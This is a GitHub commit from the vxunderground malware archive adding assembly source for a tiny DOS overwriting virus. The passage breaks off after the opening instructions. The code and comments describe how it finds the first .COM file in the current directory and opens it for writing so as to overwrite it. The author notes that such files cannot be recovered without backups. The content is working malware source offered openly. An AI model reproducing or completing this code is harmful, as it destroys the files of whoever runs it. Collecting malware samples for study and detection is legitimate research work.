Add files via upload

This commit is contained in:
vxunderground
2021-01-12 17:31:39 -06:00
committed by GitHub
parent 039994e413
commit d3381d8e02
99 changed files with 39953 additions and 0 deletions
+23
View File
@@ -0,0 +1,23 @@
;AuVS.tiny.OVERWRITING.0001
;My 1st VIRUS!!!!!!!!!!!!!!
;This is an extremely simple overwriting, tiny virus, that is easy to
;detect, but there's not much to do to clean it if you have no backups
;F-PROT detects this as an unknown TRIVIAL variant
START:
mov ah,4Eh ;Find first *.COM file in current dir
lea dx,OFFSET MASK ;*.COM
xor cx,cx ;xero out da register
int 21h ;find
mov dx,009Eh ;file handle
mov ax,3D01h ;open file for writing